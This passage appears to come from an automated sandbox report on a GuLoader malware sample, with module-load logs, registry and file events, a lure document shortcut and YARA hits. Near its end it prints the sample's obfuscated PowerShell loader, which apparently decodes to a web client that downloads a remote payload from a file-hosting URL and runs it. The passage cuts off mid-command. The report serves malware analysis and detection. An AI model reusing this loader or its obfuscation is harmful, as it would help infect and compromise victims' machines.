Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: COACH APRIL ORDER.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\COACH APRIL ORDER.doc

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Management.Automation.pdbpdbion.pdbC source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbSIL\System.Core\v4.0_4.0.0.0_ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000A.00000002.437594507.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.436179225.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.609490302.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.546777574.0000000003548000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.481865683.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.610900947.0000000007D3F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.551538295.0000000007DDF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.438301373.000000000795C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.598344112.0000000002BDC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.531460237.0000000002BAC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.632484069.0000000002C5C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
